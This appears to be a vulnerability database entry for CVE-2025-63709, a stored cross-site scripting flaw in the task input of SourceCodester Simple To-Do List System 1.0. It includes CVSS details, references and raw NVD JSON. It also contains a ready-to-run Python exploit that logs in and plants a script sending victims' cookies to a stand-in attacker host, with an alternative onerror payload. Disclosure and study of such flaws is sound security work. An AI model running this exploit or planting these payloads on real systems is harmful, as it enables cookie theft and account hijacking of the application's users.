CVE-2025-63709

Description

A Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Simple To-Do List System 1.0 in the "Add Tasks" text input. An authenticated user can submit HTML/JavaScript that is not correctly sanitized or encoded on output. The injected script is stored and later rendered in the browser of any user who views the task, allowing execution of arbitrary script in the context of the victim's browser.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:chuck24:simple_to-do_list_system:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester Simple To-Do List System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-63709 PoC - Stored XSS in SourceCodester Simple To-Do List System
# Target: SourceCodester Simple To-Do List System 1.0

TARGET_URL = "http://target-website.com"  # Replace with actual target URL
LOGIN_URL = f"{TARGET_URL}/login.php"  # Adjust path as needed
ADD_TASK_URL = f"{TARGET_URL}/add_task.php"  # Adjust path as needed

# Malicious XSS payload
XSS_PAYLOAD = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
# Alternative payload: '<img src=x onerror=alert(document.cookie)>'

def exploit():
    """
    Exploit stored XSS vulnerability in task input field
    """
    session = requests.Session()
    
    # Step 1: Login with low-privilege account
    login_data = {
        'username': 'attacker',  # Low-privilege user
        'password': 'password123'
    }
    
    try:
        response = session.post(LOGIN_URL, data=login_data, timeout=10)
        
        # Step 2: Add malicious task with XSS payload
        task_data = {
            'task': XSS_PAYLOAD,  # Inject XSS payload
            'submit': 'Add Task'
        }
        
        response = session.post(ADD_TASK_URL, data=task_data, timeout=10)
        
        # Step 3: When victim views task list, XSS will execute
        print("[+] XSS payload submitted successfully")
        print(f"[+] Payload: {XSS_PAYLOAD}")
        print("[+] Any user viewing the task list will have their cookies stolen")
        
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False
    
    return True

if __name__ == "__main__":
    print("CVE-2025-63709 - Stored XSS in Simple To-Do List System")
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63709
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63709
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63709/
[4] VulDB https://vuldb.com/cve/CVE-2025-63709
[5] https://github.com/floccocam-cpu/CVE-Research-2025/tree/main/CVE-2025-63709
[6] https://www.sourcecodester.com/php/17897/simple-do-list-system-using-php.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63709", "sourceIdentifier": "[email protected]", "published": "2025-11-10T15:15:37.793", "lastModified": "2025-12-01T20:15:54.240", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Simple To-Do List System 1.0 in the \"Add Tasks\" text input. An authenticated user can submit HTML/JavaScript that is not correctly sanitized or encoded on output. The injected script is stored and later rendered in the browser of any user who views the task, allowing execution of arbitrary script in the context of the victim's browser."}, {"lang": "es", "value": "Una vulnerabilidad de Cross-Site Scripting (XSS) existe en SourceCodester Simple To-Do List System 1.0 en el campo de texto 'Add Tasks'. Un usuario autenticado puede enviar HTML/JavaScript que no se depura o codifica correctamente en la salida. El script inyectado se almacena y luego se renderiza en el navegador de cualquier usuario que vea la tarea, permitiendo la ejecución de script arbitrario en el contexto del navegador de la víctima."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chuck24:simple_to-do_list_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "188CC7C5-CF9B-4488-B4DE-1B3547AFFDF2"}]}]}], "references": [{"url": "https://github.com/floccocam-cpu/CVE-Research-2025/tree/main/CVE-2025-63709", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://www.sourcecodester.com/php/17897/simple-do-list-system-using-php.html", "source": "[email protected]", "tags": ["Product"]}]}}